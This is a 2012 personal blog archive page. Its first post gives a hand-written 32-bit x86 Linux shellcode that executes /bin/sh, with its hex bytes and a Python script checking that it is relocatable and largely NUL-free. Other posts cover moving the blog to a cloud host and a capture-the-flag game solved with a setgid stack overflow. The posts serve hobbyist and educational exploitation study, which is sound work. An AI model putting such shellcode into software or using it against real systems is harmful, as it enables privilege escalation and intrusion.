Monthly Archives: July 2012

Relocatable shellcode without NULs

Listening to metal and smashing stacks at TheCamp.dk 2012 for fun and fame… 🙂

My creation of the day so far:

# echo $$
26506
# cat sc.asm
section .text
global _start
_start:
        xor eax, eax     ; 31 c0           eax = 0
        inc eax          ; 40              eax = 1
        shl eax, 3       ; c1 e0 03        eax = 8
        inc eax          ; 40
        inc eax          ; 40
        inc eax          ; 40              eax = 11 (sys_execve), built without a NUL in the encoding
        jmp short $ + 16 ; eb 0e           relative jump forward to the call below
        pop ebx          ; 5b              ebx = address of "/bin/sh", pushed by the call
        xor ecx, ecx     ; 31 c9           argv = NULL
        xor edx, edx     ; 31 d2           envp = NULL
        int 0x80         ; cd 80           execve("/bin/sh", NULL, NULL)
        xor eax, eax     ; 31 c0
        inc eax          ; 40              eax = 1 (sys_exit), reached only if execve fails
        xor ebx, ebx     ; 31 db           status = 0
        int 0x80         ; cd 80           exit(0)
        call $ - 14      ; e8 ed ff ff ff  relative call back to pop ebx; pushes the string address
        db "/bin/sh", 0  ; 2f 62 69 6e 2f 73 68 00
# nasm -f elf sc.asm
# ld -o sc sc.o
# ./sc
# echo $$
26542

Here you go:

printf '\x31\xc0\x40\xc1\xe0\x03\x40\x40\x40\xeb\x0e\x5b\x31\xc9\x31\xd2\xcd\x80\x31\xc0\x40\x31\xdb\xcd\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00'
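
To check the two properties the title claims (relocatable, no NUL bytes) rather than take them on trust, here is an added verification script; it is not part of the original post. It decodes the printf escape string above, compares it byte for byte with the listing in the sc.asm comments, resolves the two relative branches (jmp short rel8 and call rel32) using the listing's instruction boundaries, and reports the offset of every 0x00 byte. Both constants are copied from the post; the function names are my own.

```python
import re

# Constructed inputs, copied from the post above: the printf escape string and
# the per-instruction byte columns from the comments in sc.asm (one instruction
# per line, which gives us the instruction boundaries for free).
ESCAPED = (r"\x31\xc0\x40\xc1\xe0\x03\x40\x40\x40\xeb\x0e\x5b\x31\xc9\x31\xd2"
           r"\xcd\x80\x31\xc0\x40\x31\xdb\xcd\x80\xe8\xed\xff\xff\xff"
           r"\x2f\x62\x69\x6e\x2f\x73\x68\x00")

LISTING = """\
31 c0
40
c1 e0 03
40
40
40
eb 0e
5b
31 c9
31 d2
cd 80
31 c0
40
31 db
cd 80
e8 ed ff ff ff
2f 62 69 6e 2f 73 68 00
"""


def parse_printf_escapes(s: str) -> bytes:
    """Decode a pure \\xNN escape string (printf/shell style) into raw bytes.

    Anything that is not a \\xNN pair is rejected, so a stray character cannot
    silently shift every later byte offset."""
    if not re.fullmatch(r"(\\x[0-9a-fA-F]{2})*", s):
        raise ValueError("input is not a pure \\xNN escape sequence")
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", s))


def parse_listing(listing: str) -> list[bytes]:
    """Return one bytes object per instruction line of the listing."""
    return [bytes(int(h, 16) for h in line.split())
            for line in listing.strip().splitlines()]


def nul_offsets(blob: bytes) -> list[int]:
    """0-based offsets of every 0x00 byte in the blob."""
    return [i for i, b in enumerate(blob) if b == 0]


def branch_targets(instructions: list[bytes]) -> dict[int, int]:
    """Map the offset of each relative branch to the offset it lands on.

    Only the two encodings used in the listing are handled: jmp short rel8
    (0xEB) and call rel32 (0xE8). Both displacements are relative to the next
    instruction, so the targets stay valid wherever the blob is loaded; that
    is what makes it relocatable."""
    targets = {}
    offset = 0
    for ins in instructions:
        if (ins[0] == 0xEB and len(ins) == 2) or (ins[0] == 0xE8 and len(ins) == 5):
            disp = int.from_bytes(ins[1:], "little", signed=True)
            targets[offset] = offset + len(ins) + disp
        offset += len(ins)
    return targets


def check_shellcode(escaped: str = ESCAPED, listing: str = LISTING) -> dict:
    """Verify the escape string against the listing and test both claims."""
    blob = parse_printf_escapes(escaped)
    instructions = parse_listing(listing)
    nuls = nul_offsets(blob)
    return {
        "length": len(blob),
        "matches_listing": blob == b"".join(instructions),
        "nul_offsets": nuls,
        "nul_free": not nuls,
        "branch_targets": branch_targets(instructions),
    }


if __name__ == "__main__":
    for key, value in check_shellcode().items():
        print(f"{key}: {value}")
```

Running it confirms that the escape string matches the listing (38 bytes), that the jmp at offset 9 lands on the call at offset 25 and the call lands back on the pop ebx at offset 11 (the address it pushes, offset 30, is the start of "/bin/sh"), and that the blob has exactly one NUL byte: the string terminator at offset 37. So the code bytes are NUL-free, but the blob as a whole is not, which matters whenever a copy routine stops at the first 0x00; the check is the kind of thing to run before relying on the property.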

In the cloud


This blog is now being served by the software WordPress, Apache HTTP Server, MariaDB and Ubuntu Linux, all of which are running in a free instance in Amazon Elastic Compute Cloud.

So don’t tell me that I’m not into the game! 😛

Edit: Now I’m also using the web application accelerator Varnish. The main culprit with regard to the blog’s speed, however, seems to be HTML-resized images. This means that you always download full-size images, even though you only need small/medium versions. I haven’t found a solution for this yet. Well, at least not a free solution – the WordPress plugin ImageScaler isn’t free.

A picture of me moving the blog and blogging about it (beware of white skin!):

Treasure hunt

At the moment I’m having a jolly good time playing the game Treasure hunt. My good friend Peter Tersløv Forsberg (ptrf) gave an interesting talk about it at TheCamp.dk 2012.

The game was launched by the two computer science students br0ns and iDolf (nicknames) in May 2012 at DIKU. You’re welcome to try it out at treasure.pwnies.dk. Disguised as a game about being a pirate on the seven seas, the game gives you staged hacking challenges and rewards you with gold when you complete them. Your amount of gold dictates your placement on the game’s scoreboard. It’s all about fun and fame. If you know Project Euler and Capture the flag, look at Treasure hunt as a mixture of those two.

In the above screen shot of my terminal, I solve one of the challenges. Take a look at the lines in the terminal. Come on! Don’t be afraid 😛 Click on the screen shot to view it in its original size. I’m logged in as the user root. No, root isn’t your usual root user. He has no special privileges on this system. I want to read the file win, since it contains gold and a pointer to the next challenge. The file win, however, can only be read by the users daemon and exploitme. It’s obvious that the user daemon is the administrative user of the system. Since daemon has the ability to e.g. crash the server, I’m guessing that the objective is to read the file win by becoming the user exploitme, not daemon. Of course, the name also hints at it strongly 🙂 The executable assignment3 has the group ID exploitme and has been given the setgid attribute. If I can exploit this executable, i.e. make it do what I want it to do, I can read the file win.

Since I don’t want to spoil the game for other players, I will not publish the details of my solution. I will only say this: My first argument to the assignment3 executable is a portion of homemade 32 bit x86 bytecode that executes /bin/sh by making a Linux sys_execve system call. My second argument overflows the stack of one of the functions in the executable, thereby tricking the executable into executing the first argument.

Now I deserve a beer 😀